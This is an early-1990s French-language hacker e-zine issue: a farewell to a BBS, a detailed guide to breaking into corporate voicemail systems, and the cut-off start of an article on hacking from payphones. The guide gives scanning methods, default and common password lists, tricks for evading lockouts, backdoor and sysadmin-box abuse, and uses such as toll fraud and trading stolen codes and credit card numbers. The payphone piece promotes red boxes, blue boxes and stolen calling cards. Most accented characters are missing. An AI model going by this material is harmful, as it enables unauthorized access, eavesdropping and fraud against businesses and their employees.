ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
LA FIN DE BLITZKRIEG BBS
par
Blitzkreig
Nous en avons parl plusieurs fois dans les numros prcdents,
chaque fois pour vous dire tout le bien qu'on en pensait:
BLITZKRIEG BBS, qui avait ses assises au Kentucky, a ferm ses
portes. Au retour des ftes, Predat0r a dcid de fermer boutique,
laissant dans le deuil des centaines de pirates et d'afficionados
de l'informatique "alternative". Lorsque, aux environs du 7
janvier, j'ai appel sur la ligne de BLITZKRIEG, je suis tomb sur
un enregistrement, et c'est la gorge serre par l'motion que j'ai
appris la triste nouvelle. J'ai traduit pour vous le contenu du
message...
-----
Bonjour, je suis John, ou Predat0r, ex-sysop du Blitzkreig
BBS. J'aimerais vous dire que
compter du 12 janvier,
17h00, le
502-499-8933 sera dsactiv, ce qui voudra dire que le systme est
disparu.
Si jamais j'installe une nouvelle ligne, sous un nouveau
numro, je posterai l'information sur Pentavia, Ripco, et quelques
autres systmes populaires. J'aimerais remercier tous ceux qui nous
ont appuy lorsque le systme tait ouvert.
Depuis le mois de fvrier 1990, jusqu'en janvier 93, nous
avions reu 27,834 appels. Le dernier usager officiel tait
Sinister Solution.
Si jamais le systme repart, il sera plus gros, meilleur, et
plus underground encore qu'il ne l'avait t.
Je me retire donc officiellement en tant que Predat0r et je
ferme officiellement BLITZKRIEG. Si jamais le systme r-ouvre, ce
sera sous un nouveau nom et avec un nouveau pseudonyme.
Si vous dsirez tout de mme me rejoindre, la bote postale
est encore valide, et si vous voulez me contactez par voix,
dbrouillez-vous pour trouver le numro.
Stay free, et nous nous reverrons bientt...
-----
Sortez les mouchoirs, les mecs... Heureusement, il reste encore
quelques bons boards sur lesquels nous pouvons aller tromper notre
peine. Je pense entre autres
Cybernetic Violence, sis
l'Ile des
Soeurs, prs de Montral (c'est justement le board que visite Santa
Claus ce mois-ci).
Bien qu'il n'en ait pas fait mention dans son texte, on peut quand
mme supposer que Predat0r a pos ce geste
la suite de la
parution du plus rcent bouquin de Bruce Sterling, THE HACKER
CRACKDOWN (trs bon, au demeurant). Sterling le dcrit entre autres
comme une des personnalits de l'underground les plus respectes.
Predat0r avait repris, en 1990, la parution de TAP (Technical
Assistance Program), le grand-pre de tous les 'zines underground.
TAP avait vu le jour en 1971,
Greenwich Village (NY). Le premier
diteur de TAP n'tait autre que le regrett Abbie Hoffman, le pre
du mouvement hippie, le pape du "protest mouvement"... On est en
bonne compagnie, l
, les enfants...
Outre le fait que Predat0r tait lui-mme une "vedette", son board
tait frquent par tout ce que la plante supporte comme pirates
chevronns. Les handles les plus glorieux se croisaient sur ce
board...
Et c'est ici que je suis le plus impressionn, je crois:
contrairement aux pirates qui aiment bien faire des gorges chaudes
devant les camras, et qui sont tout
fait "partiaux" au
vedettariat, John, lui, a cru bon de s'clipser de la scne, le
temps que les projecteurs "de la gloire" se tournent vers une autre
victime. Je salue la modestie non-feinte de ce mec qui,
force de
dtermination et de travail, s'est hiss au fate de sa
"profession". L
o certains cherchent
gagner leurs galons de
pirate en crnant et en racontant des bobards, une telle attitude
fait plaisir
voir...
Prenez-en de la graine, les kids...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
LA OU LA TECHNOLOGIE LE PERMET
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
L'ABC D VMB
Par Mental Floss
Vous avez dj
rv de possder votre propre vmb? Vous avez
dj
essay de hacker une vmb, mais vous n'tes jamais parvenu
triompher? Les lignes qui vont suivre renferment la mthode miracle
de: 'comment pogner avec les VMBs'.
Cette introduction ressemble trangement aux annonces que l'on
peut retrouver dans tous les journaux et magazines bidons (y
compris Pif Gadget). On promet de rvler le secret de comment
avoir des seins plus fermes ou bien comment voir au travers de
trois murs de ciment avec un stylo. C'est sr qu'on peut se trouver
une VMB en gossant, on peut toujours composer les passwords de 0000
9999 dans l'espoir de trouver quelque chose. Mais c'est une
mthode stupide, il existe une faon bien plus simple de procder
qui vous fera conomiser du temps. Bon assez de blabla et passons
aux choses srieuses.
-/- Dfinition ->
VMB une seule dfinition: Voice Mail Box.
En franais: Bote Vocale...
-/- Qu'est-ce qu'un systme de VMBs? ->
On peut comparer un systme de VMB
un gros rpondeur
distance, qui contient plein de petits rpondeurs. Certains
systmes sont installs sur des PCs. De nos jours, on peut se
procurer un systme complet (le soft et la carte), pour environ
250$. Par contre il faut avoir un gros hard disk, car une minute de
messages compresss prend environ 200k. Donc imaginez un systme de
500 usagers, ayant un greetings d'une minute chaque et 5 messages
de 2 minutes de sauvegards...
-/- A quoi servent les VMBs? ->
A part de servir
tre hackes.. .
Les compagnies installent gnralement un systme de VMBs pour
que leurs employs puissent se laisser des messages privs entre
eux. Aussi on les utilise pour permettre aux clients de laisser un
message
la personne qu'ils essaient de rejoindre, mais qui n'est
pas disponible lors de l'appel. Certaines compagnies s'en serviront
aprs les heures de bureaux, ainsi ils ne manqueront aucuns de
leurs clients. Donc la VMB est un outil trs important pour ces
compagnies.
-/- Les diffrents moyens de rejoindre une VMB ->
Votre VMB prfre peut se rejoindre de deux faons
diffrentes, soit en composant un numro local ou un 1-800. Peu
importe si elles sont locales ou pas, elles roulent sur des
systmes de principe semblable: plusieurs botes o l'on peut
laisser des messages
des personnes diffrentes.
-/- Qui offre un service de VMB? ->
Gnralement vous pouvez obtenir une VMB tout
fait
gratuitement, si la compagnie pour laquelle vous travaillez possde
son systme. Aussi certaines compagnies prives offrent des
services de messagerie vocale, entre autres les compagnies de
locations de pagettes et de tlphones cellulaires. Bell Canada
vous offre aussi un systme local de VMB, mieux connu sous le nom
de Tl-Messageries Bell.
-/- Pourquoi hacker une VMB? ->
Certains se demanderont srement
quoi cela sert de hacker
une VMB. Les possibilits sont infinies, l'avantage principal
d'avoir une VMB est qu'on peut se faire rejoindre par n'importe qui
appelant d'Amrique, et ce sans frais pour la personne qui appelle,
condition d'avoir une VMB 1-800, qui est rejoignable en dehors du
Canada. On a juste
penser... tu rencontres quelqu'un sur un bbs,
et tu ne veux pas lui donner ton vrai numro, tu lui donnes ton
numro de VMB et voil
... Si t'as quinze petites filles qui te
courrent aprs, mais que tu veux garder ta ligne pour scanner...tu
leurs donnes ton numro de VMB, comme a elles pourront te laisser
des beaux messages dans le genre de 'Salut beaut...'
Mais
part les exemples inutiles mentionns ci-haut, on peut
utiliser sa VMB
des fins plus LGALES... Par exemples, runner une
'codeline' ou faire des 'free calls'.
Codeline? Une codeline, est une VMB qu'on utilise pour donner
et recevoir des codes (Pbx,Outdial,NUI,CC# etc) ou toutes autres
informations. Les codes que les gens laissent sur la VMB seront
plus tard posts par le propritaire de cette bote, et ainsi les
informations seront renouvelles rgulirement.
Free calls? Vous connaissez tous le principe de faire charger
un appel sur un troisime numro, donc vous utilisez votre VMB
comme troisime numro lorsque vous faites des appels
partir
d'une cabine tlphonique. Le principe est simple, comme greetings
vous enregistrez le message suivant: 'Oprateur, ce numro accepte
les frais d'appel'. Et voil
, vous venez de faire charger votre
appel sur votre VMB.
-/- Comment trouver un systme de VMB? ->
Avant de penser
hacker une box, il est capital d'avoir un
systme dans lequel on peut hacker dedans, c'est comme vident. Le
seul moyen de trouver un systme, c'est de scanner. Soit que tu
prends un prfix dans lequel que t'es sr qu'il y a une compagnie
et tu scannes dedans. Soit que tu scannes avec ToneLoc le speaker
'ON' et espre d'entendre quelques systmes parmis les 10000
numros
composer. Et finalement la mthode la plus simple est
d'utiliser des numros qu'on a dj
scann avec ToneLoc. Le
principe est simple, tu prends ton TONE.LOG et tu recomposes
manuellement tout les VOICE (1) jusqu'
temps de trouver quelque
chose. Apþs plusieurs heures de scanning
la mitaine, on a
constat que 90% des systmes de VMB taient sur des VOICE (1),
quelque fois sur des TIMEOUT (1), rarement sur BUSY/UNKNOWN et
jamais sur d'autres choses, mme pas sur un VOICE (2) ou TIMEOUT
(2). Tout a ralis avec le GETDELAY de ToneLoc
50,
l'aide
d'un modem USR HST sett
ATX6. Si vous avez des modems 2400 qui
ne dtectent pas les vrais VOICE et les vrais BUSY, ben oubliez a
et achetez-vous un VRAI modem.
Il est important de vrifier si le systme est 24 heures ou
bien seulement aprs les heures de bureau. Pour se faire vous avez
seulement
essayer de rejoindre le systme en plein jour; une
petit bonne femme rpond? Le systme est alors seulement actif
apþs les heures de bureaux, communment appel 'after hours'. Si
vous trouvez un systme after hours, ne perdez pas votre temps
hacker dedans, a ne vaut pas la peine. A part bien sr si vous
trouvez un outdial.
-/- Les modes d'accs
la VMB ->
Avant de hacker, il faut savoir comment atteindre la
messagerie. La messagerie peut s'accder en deux modes diffrents,
soit si on veut laisser un message
quelqu'un ou soit si on veut
accder
notre box. Pour laisser un message
une box on peut
faire: composer le numro pendant le message d'entre et/ou faire
# ensuite, * ou **. Un message nous dira alors
quelle box on veut
envoyer un message. Pour accder
sa box on fait gnralement #,
## ou *7 ensuite on a un message disant d'entrer son numro et son
mot de passe. Il existe aussi d'autres faons d'accder
ces
modes, il suffit d'couter le message d'entre et la plupart du
temps on explique comment.
-/- Comment trouver une box? ->
Pour hacker une box, il faut avoir une box
hacker bien sr.
Mais avant de hacker une box, il y a quelques petites choses qui
seraient intressantes de savoir si on veut sauver du temps: de
combien de chiffres est le numro de la box? La box peut-elle
commencer par tous les chiffres? Si non par lesquels?
Si un numro de box est valide, soit que:
-vous entendez le message du bonhomme
-a sonne pis le bonhomme rpond
-a sonne pis a dit que le bonhomme est pas l
et vous
pouvez laisser un message.
-a dit: Mailbox XXXX.
-en mode 'accs
la box' a dit: 'Enter your password'.
Si la box est invalide...
-a dit que la box est invalide
-que ce numro n'existe pas
-et tout autres choses du genre....
Mais attention sur certains systmes en mode 'accs
la box',
que vous entriez n'importe quel numro de box, on vous demande
toujours un mot de passe ensuite. Et cela mme si le numro de la
box n'est pas valide. Dans cette situation, le seul moyen de
vrifier si la box est valide, est de composer le numro en
question en mode 'laisser un message'.
En gnral les boxes sont de 3 ou 4 chiffres, parfois 2 ou 5
mais c'est plutt rare. Pour trouver de combien de chiffres est la
box, il suffit d'entrer dans la messagerie par n'importe quelle des
deux modes et composer des chiffres jusqu'
temps d'entendre le
message d'une box, se faire transfrer
cette extension ou bien un
message disant que le numro de la box est invalide. Parfois en
mode 'laisser message', on entre 4 chiffres et on se fait dire que
c'est invalide, mais si on va essayer la mme chose en mode 'accs
la box' apþs 3 chiffres entrs, si on se fait dire que le numro
est invalide a veut dire que la box est vraiment de 3 chiffres et
non 4. En gnral, c'est une tche trs facile de trouver de
combien de chiffres est le numro des boxes. Parfois mme, on dit
clairement: 'Composez l'extention de quatre chiffres et faites #'
Les boxes peuvent tre situes entre 1000 et 9999 (100 et 999
pour un 3 chiffres). Une premire faon d'liminer des secteurs
chercher, si les boxes se rejoignent en composant leur numros
l'entre, est de vrifier que lorsqu'on pse sur une touche, on est
pas connect
une boxe ou service direct. Exemple, je pse sur 0
et l'opratrice embarque, donc c'est sr qu'il n'y a pas de boxe
qui commence par 0. Je pse sur 1, j'ai des informations sur la
compagnie, sur 2 une bonne femme veut prendre ma commande... et
ainsi de suite. Donc on sait qu'il n'y aura aucune box commenant
par 0-1-2 etc... S'il n'y a aucun numro d'limin, commencez par
1000 et montez par coup de mille jusqu'
9000, si rien encore
commencez
1000 par coup de 100 jusqu'
9900. Si le systme a des
boxes de 3 chiffres, allez-y par 100 et ensuite 10. ATTENTION, sur
la majorit des systmes, si vous faites plus de 3 erreurs, le
systme vous raccroche. Voir plus bas pour savoir comment
contourner cela.
La plupart des boxes sont regroupes ensemble dans le mme
coin, et la plupart du temps entre 1000 et 2000 ou 4000-5000, mais
a varie. En gnral, la boxe de l'administrateur du systme est
entre 9000-9999, gnralement c'est 9999. J'utilise souvent les
termes 'la plupart du temps/gnralement', parce que la majorit
des fois c'est vrai mais a dpend toujours de l'humeur du
sysadmin. Par contre, vous ne trouverez pas 20 boxes
la suite, la
plupart du temps les boxes sont espaces de 3-4 chiffres, pour
dcourager les hackers. Aussi sur certains systmes, un rpertoire
de tous les usagers est disponible, soit en faisait 9, 1 ou *1. Si
un rpertoire est disponible, il sera annonc comment y accder
dans le message d'entre. Le principe du rpertoire est qu'
l'aide
des touches du tlphone, vous entrez les 3 premires lettres du
nom/prnom de la personne recherche. Dans cette situation, entrez
comme lettre 2 (ABC) et faites #. S'il y a pas trop de noms ou ben
que le systme est mal fait, vous pourrez avoir accs
toute la
liste des usagers. Par contre, s'il n'aime pas seulement le 2,
faites 2 5 8 et #. En gnral, il y a toujours des noms dans cette
zone. Si le systme dit : 'there's more than one name' faites #.
Soit qui te donne les noms (s'il y en a moins que cinq) ou ben qui
te dit: 'there're too many names'. En gossant avec a, il y a
toujours moyen de trouver quelques choses.
-/- J'ai trouv un paquet de boxes, lesquelles je hack? ->
Quand tu trouves une boxe, elle peut tre dans deux tats:
occupe ou libre. Vous pouvez hacker n'importe quelles boxes, mais
si vous dcidez d'en garder une, elle doit absolument ne pas
appartenir
personne, c'est ce qu'on appelle une Free Box.
Le principe des Free Boxes est le suivant: c'est une bote qui
trane sur le systme et qui n'appartient
personne. En gnral,
le sysadmin cre une dizaine de ces free boxes sur le systme.
Pourquoi vous me dites? Parce que tous les sysadmins sont paresseux
et lorsqu'un nouvel employ est engag, ils n'ont pas besoin de se
forcer le cul pour trouver une place de libre et crer une nouvelle
box. Ils ont juste
donner au nouvel employ la premire free box
de la liste. Donc si vous trouvez 10 free boxes sur un systme, il
est toujours prfrable de s'approprier la dernire ou l'avant-
dernire.
a peut tre long et laborieux de trouver une free box, car
elles sont en nombre limit et on a de grandes chances de se faire
couper aprs trois erreurs. C'est l
que a devient intressant de
hacker les boxes dj
occupes. Dans une boxe, on retrouve
gnralement l'option 'Make a Distribution List', cette option
permet de crer une liste contenant les numros de boxes des autres
usagers auxquels on veut envoyer des messages. C'est le mme
principe qu'un Group mail ou Mass Mail, envoyer un message
10
personnes en composant seulement le numro de la liste voulue. Donc
avec cette liste on peut entrer tant de numros qu'on veut sans se
faire raccrocher et on sait si le numro est valide ou pas.
Pour sauver du temps, lorsque vous hackez des boxes dj
utilises, il est bon de faire un tri avant. A chaque box valide,
coutez le message: si c'est une femme qui parle, si le gars a
vraiment l'air niaiseux ou si y a des problmes d'enregistrement
(on dirait qu'il est
50 pieds du tlphone, pse sur 4-5 touches
avant de trouver la bonne pour sauver le greetings) ou toutes
autres personne qui
l'air d'un deux de pique, prenez son numro
en note. Il y a de forte chance qu'il ait choisi un mot de passe
aussi stupide que lui.
-/- Comment faire pour savoir si c'est une Free Box ->
En gnral les free boxes, n'ont pas de messages d'annoncement
(greetings). Aucun nom n'a t assign
la bote. Donc si vous
composez un numro et a dit: MAILBOX XXXX, il y a des bonnes
chances qu'elle soit free. De plus, si vous tes en mode 'accs
la box' et que lorsque vous entrez un numro a dit: 'This voice
mail system will increase your...blabla...Please enter the password
assigned to you by your system manager....', c'est officiel que
cette box est free. Mais si a dit: 'Tony Lamothe, Please enter
your password...', la box est comme occupe...change de box...
Parfois la box est occupe mais n'a pas de greetings
d'enregistr. Si vous entrez dans la boxe et vous trouvez un paquet
de messages rcents, changez de box...
-/- Comment trouver le mot de passe de la free box en question ->
Lorsqu'on hack une free box, il ne faut pas se casser la tte
essayer des mots de passe compliqus. En gnral, les free boxes
ont des mots de passe trs faciles
retenir, car la majorit des
sysadmins n'ont mme pas leur secondaire cinq; pensez-vous qu'ils
seraient capable de retenir un mot de passe de dix chiffres random
pendant cinq mois? Non. Donc le principe est d'essayer des mots de
passe vraiment niaiseux. De plus, la majorit des systmes de VMBs
ont des mots de passe par dfaut pour les free boxes. La liste qui
suit donne les mots de passe
essayer.
Mots de passe par dfaut:
-------------------------
Le mot de passe est pareil que le numro de la box.
exemple: box = 2637 pwd = 2637
Le mot de passe est l'inverse du numro de la box.
exemple: box = 3279 pwd = 9723
Le mot de passe est le numro de la box plus un 0. Cette
mthode est trs poupulaire avec les systme de type ASPEN.
exemple: box = 627 pwd = 6270
Autres mots de passe
essayer:
-------------------------------
0000 Trs frquent
1111 Frquent
9999 Frquent
1234 Les usagers aiment bien ce mot de passe!
4321
2222
3333
4444
5555
6666
7777
8888
9999
Si la box a plus de 4 chiffres, rajouter des chiffres pour que
la longueur du mot de passe gale la longueur du numro de la box.
Exemple: box = 35373, essayez genre 12345 ou 11111.
Si cela ne marche pas, essayer tous autres mots de passe que
vous trouverez pertinents. Essayez surtout des squences de
chiffres, genre 4567, 8765, 1122, ou 7337. Dans certains cas il
peut y avoir aucun mot de passe sur la box! Une chose
retenir, ne
perdez pas 2 heures
gosser sur un mot de passe qui semble
impossible
trouver. Quand vous avez essay les mots de passe par
dfaut et certains autres, et que vous voyez que cela ne donne
rien, changer immdiatement de systme. Ne perdez pas votre temps
sur des causes perdues, il existe tellement d'autres systmes de
VMBs. Vous aurez juste
re-scanner un peu et de nouveau vous
pourrez dplomber une autre box vierge.
Sur certains systmes, on peut savoir quelle est la longueur
du mot de passe. Si apþs quatre chiffres entrs, vous entendez un
message disant que le mot de passe est invalide, il y a de fortes
chances que le mot de passe soit de quatre chiffres. Par contre un
systme comme 'Message Center' vous donnera un message d'erreur
lorsque vous aurez entr un chiffre de plus que la longueur du mot
de passe. Mais attention, certains systmes attendent 2-3 secondes
avant de dire si le mot de passe est invalide ou pas, donc il est
quasiment impossible de deviner la longueur du mot de passe. Sur
d'autres vous devrez faire # pour valider le mot de passe, donc
encore ici aussi c'est presque impossible. Dans 80% des cas, les
mots de passe sont de quatre chiffres, donc essayez plus souvent
des mots de passe de cette longueur.
Parfois, certains systmes bloquent carrment l'accs
la box
lors d'erreurs rptes. Lorsque vous entrez 3 mauvais mots de
passe de suite, la box se barre automatiquement. Le seul moyen de
russir
entrer de nouveau est de demander au sysadmin. C'est un
trs bon moyen de protection, mais il est rarement utilis.
Dans de rares occasions, le systme peut contenir une backdoor
qui permet d'entrer dans n'importe quelle box, mme si on ne
connat pas le mot de passe. Si lorsque vous tes en mode 'laisser
message', vous composez un numro et que rien ne se passe mais
qu'au bout de 5-6 secondes a raccroche, il y a de fortes chances
que ce soit une backdoor. Pour l'utiliser, vous avez juste
composer le numro de la backdoor suivit du numro de la box
dsire et bingo le tour est jou.
-/- Comment djouer la passe du Hang-Up apþs trop d'erreurs ->
Sur certains systmes a marche, sur d'autre a marche
moiti ou pas du tout. Il y a des hang-ups
cause de trop
d'extensions invalides ou bien trop de mots de passe errons. Pour
contourner le hang-up apþs trop de boxes invalides, c'est trs
simple: il suffit d'entrer un numro de box valide
tous les deux
boxes invalides et ainsi de suite. Au dbut on peut se faire hang-
uper plusieurs fois avant de trouver un numro valide.
Exemple: je sais que 1234 est une bote valide.
je fais 2500...box invalide
je fais 2600...shit invalide
je fais 1234...cool valide et on recommence..
2700...invalide
2800...invalide
1234...Ok, vous comprennez le principe?
En gneral, apþs trois mauvais mot de passe on se fait hang-
uper... Donc, sur certains systmes, aprs deux erreurs t'as juste
faire * et tu vas revenir au message d'entre. Et ainsi tu peux
recommencer autant de fois que tu veux. Parfois, * ne marche pas
donc t'es oblig de rappeler
tous les coups.
Des fois vous pouvez utiliser ces trucs dans les deux modes,
i.e: * marche pour le mode 'laisser msg' et le numro valide marche
pour 'accs
la box'.
-/- Que fais-je une fois la box dplombe? ->
Plus on prend de prcautions, plus notre box va durer
longtemps. C'est sr que si tu t'appropries la box d'un usager, a
sera pas long que tu vas l'avoir perdue. Le gars quand il va
essayer d'accder
sa bote et qu'il va voir que son mot de passe
et son greetings sont changs, va immdiatement contacter le
sysadmin. Le sysadmin sera averti qu'il y a du monde qui essaye de
hacker le systme et renforcera les mesures de scurit. Donc c'est
pour cela qu'il ne faut jamais et je dis jamais, prendre une box
dj
occupe. Par contre si tu entres dans la box de quelqu'un et
que tu trouves 10 nouveaux messages datant de 3 mois, il y a de
fortes chances que la personne n'utilise plus sa box. Donc c'est
seulement dans cette situation qu'on peut prendre une box non free.
a peut prendre un bon moment avant que quelqu'un s'aperoive de
quelque chose d'anormal, si t'as hack une free box.
Ok, premire chose que tu fais une fois que t'as une free box,
tu touches
RIEN. Ne change rien, appelle rgulirement la box
pendant 2-3 jours ouvrables, pour voir s'il y a des nouveaux
messages. Si oui, oublies-a et changes de box, sinon cette fois
changes seulement le mot de passe et revrifies encore pendant 2-3
jours. S'il n'y a toujours pas de nouveaux messages, change le
greetings (message d'annoncement) et vrifie de temps en temps
encore un peu. N'enregistres pas un message genre: 'Salut les boys
ici Tony The Ripper, j'ai des CCs pour vous les voici...blabla'.
Voyez le genre?. Aprs une dizaine de jours, vous aurez une box qui
risque de durer plus longtemps que si
la premire occasion vous
aviez tout chang dedans. Il y a des boxes qui durent plus de 6
mois et d'autres seulement 12 heures, tout dpend de la patience
qu'on a...
-/- Les types de systmes ->
Il existe diffrents types de systmes, avec de la pratique
vous serez capable des distinguer facilement. Voici une liste des
systmes les plus populaires avec une brve description pour
chacun.
ASPEN
-----
Un des bons systmes contenant beaucoup d'options. Il est
facile
reconnatre car la plupart du temps c'est une voix de
femme qui rpond: 'Hello, this is ASPEN, an automated speech
exchange network'. Pour entrer dans le systme de messagerie
faites: '*', vous entendrez alors: 'Please dial the number of the
person you're calling, if you have a box on this system press #'.
Gnralement les box sont de 3-4 chiffres et les mots de passe de
4-5 chiffres. Lorsque vous composez un numro de box qui n'existe
pas, la premire fois a dit 'Mailbox XXXX is Invalid', la deuxime
fois a dit: 'You dialed XXXX there's no such number here' et la
troisime fois a raccroche. Le mot de passe par dfaut est
gnralement le numro de la box + 0.
AUDIX
-----
Contient presque toutes les mmes options que les autres, mais
ce qui caractrise ce systme est l'usage de * plus une lettre pour
accder aux options. Exemples: Transfrer d'extension *T(8), logger
dans le systme de messagerie *S(7), avoir de l'aide *H(4), effacer
le message *D(3) etc...
MERIDIAN MAIL
-------------
C'est un des systmes qui contient le plus d'options. En
gnral, on choisi l'option voulue en appuyant sur 2 chiffres. Ce
systme est facile
reconnatre, car la plupart du temps il
rpond: 'Meridian Mail, to mailbox...' et une fois la box compose
il dit : 'Mailbox X-X-X-X'.
CINDY
-----
Un autre systme assez frquent. Il rpond en disant: 'Good
morning, please enter the mailbox you wish to reach'. Aprs trois
essais infructueux, le systme dit: 'Good morning/evening' et
raccroche. Ce qui est intressant avec ce systme, c'est que vous
pouvez crer un genre de sous-box 'invit', en tout 4 boxes: home,
2 guest et 1 secretary. En fait se sont d'autres mots de passe que
vous dfinissez pour les sous-boxes, et le nombre d'options sera
restreint selon le mot de passe entr. Le mot de passe par dfaut
est gnralement 0.
Il y a aussi des QMAIL, Phone Mail, CallXpress, Genesis,
Message Center et d'autres systmes qui ne se nomment pas. A la
longue, vous serez capables des reconnatre.
-/- Les boxes des sysadmins ->
La plupart des systmes contiennent une boxe qui permet de
tout contrler. Avec cette boxe, on peut crer des boxes, changer
les diffrents greetings d'entre, changer les options du menu
principal, dfinir o a sonne quand on pse sur 0 etc... Mais ce
n'est pas toutes les boxes de sysadmin qui permettent de faire
cela, en gnral ils peuvent seulement changer les greetings
d'entre et quelques autres choses pas importantes. La meilleure
chose
faire avec une box sysadmin, est de vous crer une boxe
dans un coin pas trop occup du systme. Ou bien vous pouvez
changer o sonnent certaines extensions, en les redirigeant vers
des numros externes, style bbs et pbx.
Il y a des systmes qui se contrlent seulement
partir de
PC. Parfois certaines boxes se connectent
des carrier et on peut
ainsi avoir accs
diverses commandes d'administration. Les boxes
de sysadmins sont gnralement entre 9000 et 9999, le plus souvent
c'est 9999 ou 999. Les boxes qui donnent un carrier ont
gnralement un numro plus long d'un chiffre, 12345 au lieu de
1234 et ne se trouvent
pas assurment en haut du 9000, mais plutt
un peu partout.
-/- Exemple d'un menu de sysadmin ->
System Maintenance Function
1:Change Or Delete A system Broadcast Message
2:Record or delete a mailbox name
3:Record or delete The System Greeting
4:Record or delete logon msg
5:Record an announcement message
6:Change answer mode override
7:Change new msg into annoucement
8:Change save msg into annoucement
*: Quit system admin
-/- Conclusion ->
Une vmb c'est bien plaisant, et encore bien plus plaisant
quand t'es capable de les hacker facilement. Dans pas grand temps,
vous aurez tellement de VMBs, que vous ne saurez mme plus quoi en
faire. D'ici l
, continuez
espionner sur les systmes en coutant
les messages. Mais rappelez-vous ceci: 'Jouez prudemment, moi je
peux remettre mon bras, vous pas....' -Astor
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ
A QUI APPARTIENT LE RATON QUI RONGE NOS FILS?!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
HACKER D'UNE FORTERESSE
par Blitzkreig
Plusieurs de vos messages, au cours des dernires semaines, taient
l'effet que le hack d'une cabine tlphonique tait peut-tre la
voie du futur. Oui, mais comment s'y prendre?
Les cabines tlphoniques pullulent dans le paysage de la vieille
capitale. Certains endroits, comme le Mail St-Roch, possdent mme
des cabines accessibles
toute heure du jour ou de la nuit, au
chaud, avec des bancs proches, bref, c'est quasiment comme si vous
tiez dans votre salon... On appelle les cabines tlphoniques
"forteresses" pour une bonne raison: rien, ou presque rien, ne peut
vous arriver lorsque vous faites du modem
partir d'une cabine
tlphonique. Le temps de raction des techniciens du Bell (surtout
la nuit) exclut que vous vous ramassiez avec trois voitures de
police autour de votre cabine. Contrairement aux oprations de
tlmatique conduites depuis votre domicile, vous pouvez encore,
d'une cabine tlphonique, utiliser des stratagmes frauduleux
comme la bote rouge, la bote bleue, les cartes d'appel voles,
bref, toute la panoplie des petits trucs qui vous sont dsormais
interdits de chez vous...
Ce qu'il faut retrouver dans le kit de tout bon hacker nomade...
Vous avez besoin, naturellement d'un portatif. Bon, pas besoin de
vous ruiner, l
, pas besoin d'un 486-50 pour hacker d'une cabine!
Une machine puissante, vous le savez comme moi, n'est souvent
requise que pour faire fonctionner des jeux sophistiqus. Et vous
n'allez pas dans une cabine pour jouer, mais bien pour leecher,
downloader des warez, hacker des systmes, et courir les babs LD.
Un vieux 286 portatif est amplement suffisant, le reste, c'est du
gaspillage. C'est une bonne nouvelle parce que, en cherchant un
peu, vous allez trouver un 286 usag sur le march pour moins de
500 dollars.
Vous aurez aussi besoin d'un modem portatif, interne ou externe. Un
modem interne va pouvoir s'alimenter
mme la batterie de votre
portatif. Un modem externe, par contre, pourrait exiger que vous
ayez une source d'alimentation supplmentaire (mais pas dans tous
les cas). Si vous tes
l'intrieur d'un immeuble, pas de
problmes. Si par contre vous tes sur le trottoir, je ne vous
conseille pas de tenter de brancher votre gear sur la batterie de
votre voiture. Vous devrez peut-tre vous acheter un modem
portatif, alors ouvrez bien vos oreilles: ZyXEL, c'est la marque
